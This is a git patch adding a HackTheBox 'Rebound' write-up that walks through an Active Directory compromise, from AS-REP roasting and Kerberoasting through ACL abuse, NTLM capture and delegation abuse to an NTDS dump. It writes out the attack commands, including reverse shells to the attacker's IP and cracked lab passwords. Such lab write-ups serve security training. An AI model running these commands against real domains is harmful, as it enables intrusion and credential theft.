From a6f3cf19f50b62d73d9c38a66f5e83c2969b78ea Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Mon, 1 Apr 2024 01:53:46 +0300
Subject: [PATCH] Create Rebound.md
---
HackTheBox/Rebound.md | 363 ++++++++++++++++++++++++++++++++++++++++++
1 file changed, 363 insertions(+)
create mode 100644 HackTheBox/Rebound.md
diff --git a/HackTheBox/Rebound.md b/HackTheBox/Rebound.md
new file mode 100644
index 0000000..d31e83e
--- /dev/null
+++ b/HackTheBox/Rebound.md
@@ -0,0 +1,363 @@
+# HackTheBox - Rebound
+
+## NMAP
+
+```bash
+PORT STATE SERVICE VERSION
+53/tcp open domain Simple DNS Plus
+88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-13 22:36:56Z)
+135/tcp open msrpc Microsoft Windows RPC
+139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
+| ssl-cert: Subject:
+| Subject Alternative Name: DNS:dc01.rebound.htb
+| Issuer: commonName=rebound-DC01-CA
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-08-25T22:48:10
+| Not valid after: 2024-08-24T22:48:10
+| MD5: 6605cbaef659f555d80b7a18adfb6ce8
+|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
+|_ssl-date: 2023-09-13T22:38:03+00:00; +6h59m59s from scanner time.
+445/tcp open microsoft-ds?
+464/tcp open kpasswd5?
+593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
+636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
+|_ssl-date: 2023-09-13T22:38:04+00:00; +6h59m59s from scanner time.
+| ssl-cert: Subject:
+| Subject Alternative Name: DNS:dc01.rebound.htb
+| Issuer: commonName=rebound-DC01-CA
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-08-25T22:48:10
+| Not valid after: 2024-08-24T22:48:10
+| MD5: 6605cbaef659f555d80b7a18adfb6ce8
+|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
+3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
+| ssl-cert: Subject:
+| Subject Alternative Name: DNS:dc01.rebound.htb
+| Issuer: commonName=rebound-DC01-CA
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-08-25T22:48:10
+| Not valid after: 2024-08-24T22:48:10
+| MD5: 6605cbaef659f555d80b7a18adfb6ce8
+|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
+|_ssl-date: 2023-09-13T22:38:03+00:00; +7h00m00s from scanner time.
+3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
+| ssl-cert: Subject:
+| Subject Alternative Name: DNS:dc01.rebound.htb
+| Issuer: commonName=rebound-DC01-CA
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-08-25T22:48:10
+| Not valid after: 2024-08-24T22:48:10
+| MD5: 6605cbaef659f555d80b7a18adfb6ce8
+|_SHA-1: af8bec72779e7a0f41ad0302eff5a6ab22f01c74
+|_ssl-date: 2023-09-13T22:38:04+00:00; +6h59m59s from scanner time.
+5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-title: Not Found
+|_http-server-header: Microsoft-HTTPAPI/2.0
+9389/tcp open mc-nmf .NET Message Framing
+47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+|_http-server-header: Microsoft-HTTPAPI/2.0
+|_http-title: Not Found
+```
+
+First of all adding the DNS entries as some of the things won't work when it tries to reach DC
+
+
+
+Enumerating smb shares will null authentication, this shows us few shares, where `Shared` might be of some interest
+
+
+Accessing the shared share shows that it's empty
+
+
+
+Moving on to enumerating users, we can try using `lookupsid.py` to retrieve usernames, so first trying with null authentication
+
+
+
+This didn't work however we can try with `guest` account to brute force the SIDs of the users
+
+```bash
+lookupsid.py guest@rebound.htb
+```
+
+
+We have few usernames here
+
+```bash
+ppaul
+llune
+fflock
+```
+
+Having the usernames, AS-REP roasting can be performed to see if any of these accounts have pre-authentication disabled, `GetNPUsers` from impacket can be used here which detects for AS-REP accounts
+
+
+
+Here I got stuck for a while, not knowing what to do, check the options for lookupsid, we can specify the range for brute forcing SIDs, by default the value is 4000
+
+```bash
+lookupsid.py guest@rebound.htb 10000
+```
+
+This gives us some more user names
+
+
+Now again checking for pre-auth disabled accounts
+
+```bash
+GetNPUsers.py rebound.htb/uwu -usersfile users.txt -dc-ip rebound.htb
+```
+
+
+
+`jjones` had no pre-authentication required so grabbing the hash
+
+```bash
+hashcat -a 0 -m 18200 jjones.txt /usr/share/wordlists/rockyou.txt --force
+```
+
+But this wasn't crackable with the rockyou wordlist
+
+
+
+We can however obtain service ticket for a SPN, performing kerberoasting through an account having no pre-authentication required
+
+
+
+Using this https://github.com/ShutdownRepo/impacket/tree/getuserspns-nopreauth version of impacket since it has the `GetUsersSPNs` with no-preauth implementation
+
+
+Now using `GetUsersSPNS.py` with the jjones having no-preauthentication required we can perform ASREP-Kerberoast to retrieve the TGS hash of `ldap_monitor`
+
+
+Using hashcat on this hash, it gets cracked with the `1GR8t@$$4u`
+
+
+
+
+
+To verify if this password isn't being used on multiple accounts we can try password spraying with either use crackmapexec or kerbrute also synchronizing time zone with the DC
+
+
+
+
+
+Enumerating the domain with `python-bloodhound`
+
+```bash
+python3 /opt/BloodHound.py/bloodhound.py -d 'rebound.htb' -u 'oorend' -p '1GR8t@$$4u' -c all -ns 10.10.11.231
+```
+
+
+From bloodhound, it didn't showed anything interesting paths from ldap_monitor or oorend
+
+
+
+But we can see `ServiceMGMT` group has `GenericAll` on `Service Users` OU
+
+
+
+Enumerating ACLs through `powerview.py` but it requires kerberos authentication so first we'll need to request TGT of oorend user
+
+
+
+```bash
+powerview --use-ldaps -k --no-pass --dc-ip 10.10.11.231 rebound.htb/oorend@dc01.rebound.htb
+```
+
+Enumerating the access controls on service mgmt group, oorend has `Self` rights on the object
+
+
+
+This means that we can make oorend as the group member of service mgmt
+
+
+
+Using powerview.py we can add the group member
+
+```bash
+Add-DomainGroupMember -Identity ServiceMGMT -Members oorend
+```
+
+
+
+```bash
+Get-DomainGroup -Identity ServiceMGMT
+```
+
+
+
+Now we have GenericAll on `Service Users` OU and under this OU we have two domain users for which we can force change password
+
+
+
+We are only interested in changing the password of `winrm_svc` user since we can get login into DC with this user, for this we need to grant control over to oorend
+
+We again need to request the TGT of oorend after add him into ServiceMGMT group
+
+```bash
+Add-DomainObjectAcl -Rights 'ResetPassword' -TargetIdentity "Service Users" -PrincipalIdentity "oorend"
+```
+
+
+
+Logging in through `rpcclient` we can change winrm_svc's users password ( the changes get reverted back so we need to do this quickly )
+
+
+
+The password for this user will also be reverted so we can instead request TGT and login through winrm
+
+
+
+```bash
+evil-winrm -i dc01.rebound.htb -r REBOUND.HTB
+```
+
+
+
+Now our next target is `tbrady` since he can read GSMApassword of `Delegator` machine account
+
+
+
+Getting a shell through nc64.exe with `RunasC.exe` to get a shell with netonly authentication
+
+```bash
+\RunasCs.exe winrm_svc 'P@assword@123' -d rebound.htb 'C:\Users\winrm_svc\Documents\nc64.exe 10.10.14.142 2222 -e cmd.exe' -l 9
+```
+
+
+After having a shell, with `quser` we can find `tbrady` being logged on the DC
+
+
+
+This is going to make possible for us to trigger an NTLM authentication of tbrady and capture the NTLMv2 challenge response through `RemotePotato0`
+
+https://github.com/antonioCoco/RemotePotato0
+
+We'll choose the second option which is `Rpc capture (hash) server + potato trigger`
+
+```bash
+.\RemotePotato0.exe -m 2 -r 10.10.14.142 -x 10.10.14.142 -p 9999 -s 1
+```
+
+On our machine we'll run socat and ntlmrealyx
+
+```bash
+sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 & sudo impacket-ntlmrelayx -t ldaps://10.10.11.231
+```
+
+
+
+
+
+Cracking this NTLMv2 challenge response, we'll get the password for tbrady
+
+
+
+So now getting a shell as tbrady through RunasCS by redirecting stdin, stdout and stderr of the specified command to a remote host
+
+`RunasCs.exe tbrady 543BOMBOMBUNmanda cmd -r 10.10.14.142:2222`
+
+
+
+
+
+Transferring GMSAPasswordReader
+
+
+
+```bash
+GMSAPasswordReader.exe --AccountName delegator
+```
+
+
+
+This can also be retrieved through `bloodyAD`
+
+```bash
+bloodyAD.py -u tbrady -d rebound.htb -p 543BOMBOMBUNmanda --host 10.10.11.231 get object 'delegator$' --attr msDS-ManagedPassword
+```
+
+
+
+Using `StandIn` we can verify that delegator$ has constrained delegation set to `http/dc01.rebound.htb` with protocol transition set to false
+
+
+
+
+To abuse this we need to first edit `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute on delegator$ to add any domain user that we control and request a ticket for browser SPN to impersonate as DC01$ then with http SPN we can impersonate as any domain user we want unless it's not in `protected group` or not marked `is sensitive and cannot be delegated` (this is very new to me I don't think I may have explained it correctly) so here's the resource which can help in understanding better about this scenario https://www.thehacker.recipes/a-d/movement/kerberos/delegations/constrained
+
+
+
+First requesting TGT of delegator$
+
+
+
+With `rbcd.py` we can try reading the value of msDS-AllowedToActOnBehalfOfOtherIdentity
+
+```bash
+impacket-rbcd 'rebound.htb/delegator$' -k -no-pass -delegate-to 'delegator$' -action read -use-ldaps -dc-ip 10.10.11.231
+```
+
+
+
+We need to add ldap_monitor add in this property as this account has a SPN to dc01 `ldapmonitor/dc01.rebound.htb`
+
+
+
+```bash
+impacket-rbcd 'rebound.htb/delegator$' -k -no-pass -delegate-to 'delegator$' -action write -delegate-from ldap_monitor -use-ldaps -dc-ip 10.10.11.231
+```
+
+
+
+Requesting this account's TGT and then impersonating as DC01$, reason being we can't impersonate as administrator as it's not allowed to be delegated
+
+
+
+```bash
+getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
+```
+
+
+
+Now impersonating as DC01$ with HTTP SPN with the ticket obtained from browser SPN
+
+```bash
+getST.py -spn "http/dc01.rebound.htb" -impersonate "administrator" -additional-ticket "dc01\$.ccache" rebound.htb/'delegator$' -hashes :'CD903918320095660FF2E12072F5551C'
+```
+
+
+
+Make sure now to have `dc01.rebound.htb` in hosts file
+
+
+
+With secretsdump NTDS file can now be dumped
+
+
+
+
+
+# References
+
+- https://www.thehacker.recipes/ad/movement/kerberos/kerberoast
+- https://github.com/fortra/impacket/tree/e915faa15c13a1f68bd6e067f8f9a8de21cef7d7
+- https://www.semperis.com/blog/new-attack-paths-as-requested-sts/
+- https://github.com/aniqfakhrul/powerview.py.git
+- https://www.thehacker.recipes/a-d/movement/dacl
+- http://www.selfadsi.org/deep-inside/ad-security-descriptors.htm
+- http://www.pseale.com/pretend-youre-on-the-domain-with-runas-netonly
+- https://github.com/antonioCoco/RemotePotato0
+- https://github.com/rvazarkar/GMSAPasswordReader
+- https://www.thehacker.recipes/a-d/movement/kerberos/delegations/constrained
+- https://github.com/FuzzySecurity/StandIn